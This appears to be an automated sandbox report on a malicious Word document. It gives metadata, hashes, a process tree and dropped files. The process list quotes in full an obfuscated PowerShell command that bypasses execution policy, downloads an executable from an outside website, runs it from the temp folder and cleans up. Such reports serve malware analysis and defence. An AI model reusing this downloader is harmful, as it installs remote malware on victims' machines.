File name: | e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e |
Full analysis: | https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 07:25:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia. |
MD5: | B3B1760D2E5525A562F2D7A49C27ED93 |
SHA1: | 94BE3E9B653FF9C2DB2FEA0A3FFB5F02E533D77E |
SHA256: | E32940C52AED3B787267F4B8D528AF97108B46F5254578CBAAB20768D98F589E |
SSDEEP: | 3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J |
.doc | Microsoft Word document (33.9) |
Category: | sunt |
Manager: | Hertha Scholtz B.A. |
Company: | Junck Matthäi OHG mbH |
Slides: | -2147483648 |
Notes: | -2147483648 |
Lines: | 6422 |
HiddenSlides: | -2147483648 |
Bytes: | -2147483648 |
Paragraphs: | 191 |
Comments: | Deserunt dolorem natus quae vel quia. |
Pages: | 64 |
Words: | 2331 |
TotalEditTime: | 2.0 minutes |
Title: | Dokument N892778 |
Template: | Normal |
Subject: | Dokument N892778 |
RevisionNumber: | 181519 |
LastModifiedBy: | Eduard Schuchhardt B.A. |
Keywords: | voluptate, earum, enim |
Security: | None |
ModifyDate: | 2018:10:01 23:48:18 |
CreateDate: | 2018:10:01 23:48:18 |
Characters: | 2331 |
Author: | Eduard Schuchhardt B.A. |
Software: | Microsoft Office Word |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
CompObjUserTypeLen: | 39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2372 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
1784 | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression 
($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0); | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr | — | — | — |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | C602DFE9823E722F2F602F33A37CBB13 | B9F85015219CA33C2616875F9802DCEDE0301FBD50F4336F285FCB9712451DE2 |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | 54EFE3C64894D8001451CFCADF9C0F3C | 52FBDDD19233ECC3F43CE229F6EA525C6775F435445E4811421195C40F8F569D |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNK | lnk | 1646F6F20D0CFC75416A644F97532017 | B32EBC7D5CF76DF0C0A167BEE162B7523FC4CF2FDDF30744486C5869F2072E60 |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xml | text | FF6EEB8125B9265C5BA40AF9F7C6F6BC | 7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xml | xml | 1AB2FD4B6749AD6831C86411FDCAFB48 | 98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF |
2372 | WINWORD.EXE | C:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc | pgc | ADEB6243CB5FAD24CF9D150EC6AA3E0D | 0B567364B7EA4A3E8846D6D723ECE32DD8D14C1CF9893AF84900686D538FF0FB |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xml | xml | C93A361112351B30E2C959E72789952D | 4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txt | text | 847B0C3A6010660492ECC1D88A69210D | 7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B |
2372 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txt | text | 409ED6BE5314BAC97AFC88ACA11725A8 | 613EBA45D12113B49D942FF9CFC939F0F5C8CABB819B5B3BD47B7A4F9E719D48 |